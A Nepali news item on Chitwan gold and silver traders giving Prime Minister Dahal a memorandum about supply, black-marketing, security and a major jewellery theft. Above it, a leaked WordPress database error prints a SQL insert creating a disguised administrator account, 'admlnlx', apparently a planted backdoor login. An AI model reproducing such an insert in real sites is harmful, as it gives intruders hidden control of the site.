WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BZBWhcG5HhnEbQnk3/2Ie3hcKHGdw21', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 11:43:09', '', 'admlnlx', 'admlnlx')
चितवन, माघ २६–
नेपाल सुनचाँदी व्यवसायी संघ चितवनले सुनचाँदी व्यवसायको विद्यमान समस्या सुनको आपूर्ति, कालो बजारी, व्यवसायीक सुरक्षा, आधुनिक सुनचाँदी पसल–चोरी प्रकरण लगायत विषयलाई लिएर प्रधानमन्त्री पुष्पकमल दाहाल प्रचण्डलाई आज ज्ञापन पत्र बुझाएको छ ।
प्रधानमन्त्री दाहाललाई ज्ञापन पत्र बुझाउँदै नेपाल सुनचाँदी व्यवसायी संघ चितवनका अध्यक्ष जीवनज्योति विश्वकर्माले वर्तमान समयमा सुनचाँदी व्यवसायहरूले भोग्नु परेका समस्या लगायत नेपालको सुनचाँदी इतिहासमा नै सबैभन्दा ठूलो ठानिएको चोरी सिघ्र प्रभावकारी अनुसन्धान र सत्य तथ्य पत्ता लगाएर चोरिएका गरगहनाहरू सुरक्षित रूपमा पीडितलाई फिर्ता गर्नका लागि र अपराधीहरूलाई कानूनको कठघरामा उभ्याउन जोड्दार आग्रह गरेका थिए ।